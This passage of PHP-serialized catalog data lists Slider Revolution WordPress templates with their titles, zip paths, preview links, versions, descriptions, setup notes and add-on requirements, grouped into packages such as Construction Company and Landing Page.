customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:324;a:25:{s:2:\"id\";s:3:\"340\";s:5:\"title\";s:14:\"Basic Lightbox\";s:5:\"alias\";s:14:\"basic-lightbox\";s:3:\"zip\";s:24:\"packs/basic-lightbox.zip\";s:3:\"uid\";s:32:\"e4b025b300b1a8f417d04eb80113fac2\";s:3:\"img\";s:25:\"basic-lightbox/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:325;a:22:{s:2:\"id\";s:3:\"341\";s:5:\"title\";s:13:\"Nature Slider\";s:5:\"alias\";s:13:\"nature-slider\";s:3:\"zip\";s:17:\"nature-slider.zip\";s:3:\"uid\";s:32:\"eef1a4584ec1c3b8c26c305cca44e805\";s:3:\"img\";s:24:\"nature-slider/slide1.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/nature-explorer-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:151:\"<span class=\"ttm_content\">The Nature Explorer Slider Template uses the Distortion and Particle Effects Add-Ons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:356:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"},{\"path\":\"revslider-liquideffect-addon\\/revslider-liquideffect-addon.php\",\"name\":\"Distortion Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:326;a:22:{s:2:\"id\";s:3:\"342\";s:5:\"title\";s:11:\"Art Gallery\";s:5:\"alias\";s:11:\"art-gallery\";s:3:\"zip\";s:15:\"art-gallery.zip\";s:3:\"uid\";s:32:\"b8c5095ae3407337e6e5b2a8515e7d6e\";s:3:\"img\";s:22:\"art-gallery/slide1.jpg\";s:7:\"preview\";s:62:\"https://revolution.themepunch.com/art-gallery-slider-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A modern slider with large, geometric elements and interesting mask animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:327;a:25:{s:2:\"id\";s:3:\"343\";s:5:\"title\";s:20:\"Construction Company\";s:5:\"alias\";s:28:\"construction-company-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:36:\"construction-company-website-package\";s:3:\"img\";s:33:\"packages/construction_package.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/construction-company-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:244:\"<span class=\"ttm_content\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Construction Company\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"26\";s:9:\"installed\";b:0;}i:328;a:25:{s:2:\"id\";s:3:\"344\";s:5:\"title\";s:19:\"Construction Header\";s:5:\"alias\";s:19:\"Construction-Header\";s:3:\"zip\";s:29:\"packs/Construction-Header.zip\";s:3:\"uid\";s:32:\"5c77de774b8f5487c1276c4a7b3dc80c\";s:3:\"img\";s:30:\"Construction-Header/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/construction-company-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:244:\"<span class=\"ttm_content\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Construction Company\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"26\";s:9:\"installed\";b:0;}i:329;a:25:{s:2:\"id\";s:3:\"345\";s:5:\"title\";s:17:\"Construction Home\";s:5:\"alias\";s:17:\"Construction-Home\";s:3:\"zip\";s:27:\"packs/Construction-Home.zip\";s:3:\"uid\";s:32:\"fcb277f0c07dad270d2a7cef4431bef8\";s:3:\"img\";s:28:\"Construction-Home/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/construction-company-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:244:\"<span class=\"ttm_content\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Construction Company\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"26\";s:9:\"installed\";b:0;}i:330;a:25:{s:2:\"id\";s:3:\"346\";s:5:\"title\";s:21:\"Construction Projects\";s:5:\"alias\";s:21:\"Construction-Projects\";s:3:\"zip\";s:31:\"packs/Construction-Projects.zip\";s:3:\"uid\";s:32:\"0c847173c3739f79778dc2c0fc9704e4\";s:3:\"img\";s:32:\"Construction-Projects/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/construction-company-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:244:\"<span class=\"ttm_content\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Construction Company\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"26\";s:9:\"installed\";b:0;}i:331;a:25:{s:2:\"id\";s:3:\"347\";s:5:\"title\";s:20:\"Construction History\";s:5:\"alias\";s:20:\"Construction-History\";s:3:\"zip\";s:30:\"packs/Construction-History.zip\";s:3:\"uid\";s:32:\"758da120c4b6c5606692faf0aa43aac6\";s:3:\"img\";s:31:\"Construction-History/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/construction-company-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:244:\"<span class=\"ttm_content\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Construction Company\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"26\";s:9:\"installed\";b:0;}i:332;a:25:{s:2:\"id\";s:3:\"348\";s:5:\"title\";s:21:\"Construction Services\";s:5:\"alias\";s:21:\"Construction-Services\";s:3:\"zip\";s:31:\"packs/Construction-Services.zip\";s:3:\"uid\";s:32:\"5ad5b841c1d89e97ddbf972c8b11abd4\";s:3:\"img\";s:32:\"Construction-Services/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/construction-company-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:244:\"<span class=\"ttm_content\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Construction Company\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"26\";s:9:\"installed\";b:0;}i:333;a:25:{s:2:\"id\";s:3:\"349\";s:5:\"title\";s:21:\"Construction Contacts\";s:5:\"alias\";s:21:\"Construction-Contacts\";s:3:\"zip\";s:31:\"packs/Construction-Contacts.zip\";s:3:\"uid\";s:32:\"b8c3c34046bb91ebb243e4da64745d37\";s:3:\"img\";s:32:\"Construction-Contacts/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/construction-company-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:244:\"<span class=\"ttm_content\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Construction Company\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"26\";s:9:\"installed\";b:0;}i:334;a:22:{s:2:\"id\";s:3:\"350\";s:5:\"title\";s:22:\"Classic Cars Evolution\";s:5:\"alias\";s:22:\"Classic-Cars-Evolution\";s:3:\"zip\";s:26:\"Classic-Cars-Evolution.zip\";s:3:\"uid\";s:32:\"7061757f128fd624b0227715dab73b74\";s:3:\"img\";s:33:\"Classic-Cars-Evolution/slide1.jpg\";s:7:\"preview\";s:65:\"https://revolution.themepunch.com/classic-cars-before-after-hero/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:156:\"<span class=\"ttm_content\">The Classic Cars Evolution Slider is a great example of our popular before & after Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-beforeafter-addon\\/revslider-beforeafter-addon.php\",\"name\":\"Before After AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:335;a:22:{s:2:\"id\";s:3:\"351\";s:5:\"title\";s:21:\"404 Error Space Theme\";s:5:\"alias\";s:21:\"404-Error-Space-Theme\";s:3:\"zip\";s:25:\"404-Error-Space-Theme.zip\";s:3:\"uid\";s:32:\"6412adc7ec025826328e40e552a14e1e\";s:3:\"img\";s:32:\"404-Error-Space-Theme/slide1.jpg\";s:7:\"preview\";s:49:\"https://revolution.themepunch.com/404-error-page/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">The Classic Cars Evolution Slider is the perfect way to make your error page more beautiful.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:336;a:25:{s:2:\"id\";s:3:\"352\";s:5:\"title\";s:12:\"Landing Page\";s:5:\"alias\";s:20:\"landing-page-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:28:\"landing-page-website-package\";s:3:\"img\";s:23:\"packages/lp_package.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:337;a:25:{s:2:\"id\";s:3:\"353\";s:5:\"title\";s:17:\"Landing Page Hero\";s:5:\"alias\";s:17:\"landing-page-hero\";s:3:\"zip\";s:27:\"packs/landing-page-hero.zip\";s:3:\"uid\";s:32:\"d328635caa20da7ee8a3ab687f8656ff\";s:3:\"img\";s:28:\"landing-page-hero/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:338;a:25:{s:2:\"id\";s:3:\"354\";s:5:\"title\";s:21:\"Landing Page Features\";s:5:\"alias\";s:21:\"landing-page-features\";s:3:\"zip\";s:31:\"packs/landing-page-features.zip\";s:3:\"uid\";s:32:\"6552bc72abace10918a64866d9bb79c1\";s:3:\"img\";s:32:\"landing-page-features/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:339;a:25:{s:2:\"id\";s:3:\"355\";s:5:\"title\";s:20:\"Landing Page Callout\";s:5:\"alias\";s:20:\"landing-page-callout\";s:3:\"zip\";s:30:\"packs/landing-page-callout.zip\";s:3:\"uid\";s:32:\"c5b101ea5471e7409ae7effa8d45fbcf\";s:3:\"img\";s:31:\"landing-page-callout/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:340;a:25:{s:2:\"id\";s:3:\"356\";s:5:\"title\";s:20:\"Landing Page Content\";s:5:\"alias\";s:20:\"landing-page-content\";s:3:\"zip\";s:30:\"packs/landing-page-content.zip\";s:3:\"uid\";s:32:\"34da8057a6bb3677c9adf9f18ffc6cf0\";s:3:\"img\";s:31:\"landing-page-content/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:341;a:25:{s:2:\"id\";s:3:\"357\";s:5:\"title\";s:25:\"Landing Page 